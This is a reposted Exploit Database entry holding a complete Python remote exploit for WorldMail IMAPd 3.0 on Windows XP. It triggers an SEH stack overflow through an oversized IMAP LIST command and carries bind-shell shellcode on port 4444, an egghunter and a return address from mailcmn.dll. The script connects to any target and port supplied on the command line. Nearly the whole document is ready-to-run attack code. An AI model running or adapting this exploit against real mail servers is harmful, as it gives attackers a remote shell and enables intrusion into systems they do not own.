WorldMail IMAPd 3.0 – Remote Overflow (SEH) (Egghunter)

• Exploit Database
• 9 阅读

• 作者： TheXero
  日期： 2012-01-12
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18354/

• #!/usr/bin/env python
  # -*- coding: latin-1 -*- # ####################################################
  #____ _ __ #
  # _____ __/ / /__ ___ ______ ______(_) /___ __ #
  #/ _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
  # /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /#
  #/___/ nullsecurity team #
  ##
  # wm-imapd.py - WorldMail IMAPD remote exploit #
  ##
  # DATE #
  # 09/01/2012 #
  ##
  # DESCRIPTION#
  # WorldMail IMAPD - SEH overflow - remote exploit#
  ##
  # AUTHOR #
  # TheXero - http://www.nullsecurity.net/ #
  ##
  ################################################################################
  
  import sys
  import socket
  
  ## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)
  ## Tested on: XP SP3 en-us
  ## Author: TheXero
  ## Website: www.thexero.co.uk
  ## http://www.nullsecurity.net
  
  ## Check for parameters
  if len(sys.argv) != 3:
  print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
  quit()
  
  ## Assigns the parameters
  target = sys.argv[1]
  port = int(sys.argv[2])
  
  ## Sets up the socket
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  
  ## Sets the variables
  char = "}"
  nseh = "\xeb\x06\x90\x90"
  seh = "\x4e\x3b\x01\x10" ## 10013B4E|. 59 POP ECX mailcmn.dll
  buffer = '\x90' * 8
  shellcode = ("T00WT00W" ## Bindshell port 4444
  "\xbd\xe8\x39\x05\xa5\xdb\xdb\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
  "\x56\x31\x68\x13\x03\x68\x13\x83\xc0\xec\xdb\xf0\x59\x04\x92"
  "\xfb\xa1\xd4\xc5\x72\x44\xe5\xd7\xe1\x0c\x57\xe8\x62\x40\x5b"
  "\x83\x27\x71\xe8\xe1\xef\x76\x59\x4f\xd6\xb9\x5a\x61\xd6\x16"
  "\x98\xe3\xaa\x64\xcc\xc3\x93\xa6\x01\x05\xd3\xdb\xe9\x57\x8c"
  "\x90\x5b\x48\xb9\xe5\x67\x69\x6d\x62\xd7\x11\x08\xb5\xa3\xab"
  "\x13\xe6\x1b\xa7\x5c\x1e\x10\xef\x7c\x1f\xf5\xf3\x41\x56\x72"
  "\xc7\x32\x69\x52\x19\xba\x5b\x9a\xf6\x85\x53\x17\x06\xc1\x54"
  "\xc7\x7d\x39\xa7\x7a\x86\xfa\xd5\xa0\x03\x1f\x7d\x23\xb3\xfb"
  "\x7f\xe0\x22\x8f\x8c\x4d\x20\xd7\x90\x50\xe5\x63\xac\xd9\x08"
  "\xa4\x24\x99\x2e\x60\x6c\x7a\x4e\x31\xc8\x2d\x6f\x21\xb4\x92"
  "\xd5\x29\x57\xc7\x6c\x70\x30\x24\x43\x8b\xc0\x22\xd4\xf8\xf2"
  "\xed\x4e\x97\xbe\x66\x49\x60\xc0\x5d\x2d\xfe\x3f\x5d\x4e\xd6"
  "\xfb\x09\x1e\x40\x2d\x31\xf5\x90\xd2\xe4\x5a\xc1\x7c\x56\x1b"
  "\xb1\x3c\x06\xf3\xdb\xb2\x79\xe3\xe3\x18\x0c\x23\x2a\x78\x5d"
  "\xc4\x4f\x7e\x70\x48\xd9\x98\x18\x60\x8f\x33\xb4\x42\xf4\x8b"
  "\x23\xbc\xde\xa7\xfc\x2a\x56\xae\x3a\x54\x67\xe4\x69\xf9\xcf"
  "\x6f\xf9\x11\xd4\x8e\xfe\x3f\x7c\xd8\xc7\xa8\xf6\xb4\x8a\x49"
  "\x06\x9d\x7c\xe9\x95\x7a\x7c\x64\x86\xd4\x2b\x21\x78\x2d\xb9"
  "\xdf\x23\x87\xdf\x1d\xb5\xe0\x5b\xfa\x06\xee\x62\x8f\x33\xd4"
  "\x74\x49\xbb\x50\x20\x05\xea\x0e\x9e\xe3\x44\xe1\x48\xba\x3b"
  "\xab\x1c\x3b\x70\x6c\x5a\x44\x5d\x1a\x82\xf5\x08\x5b\xbd\x3a"
  "\xdd\x6b\xc6\x26\x7d\x93\x1d\xe3\x8d\xde\x3f\x42\x06\x87\xaa"
  "\xd6\x4b\x38\x01\x14\x72\xbb\xa3\xe5\x81\xa3\xc6\xe0\xce\x63"
  "\x3b\x99\x5f\x06\x3b\x0e\x5f\x03")
  
  ## Calculates the size of junk depending on the shellcode
  junk = "\x41" * (769 - len(shellcode))
  
  ## Egg Hunter
  hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
  "\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
  
  ## Assembles the buffer
  buffer = char + junk + shellcode + nseh + seh + hunter + char
  
  ## Connects
  s.connect((target,port))
  data=s.recv(1024)
  s.send("a001 LIST " + buffer + "\r\n")
  s.close()
  
  # EOF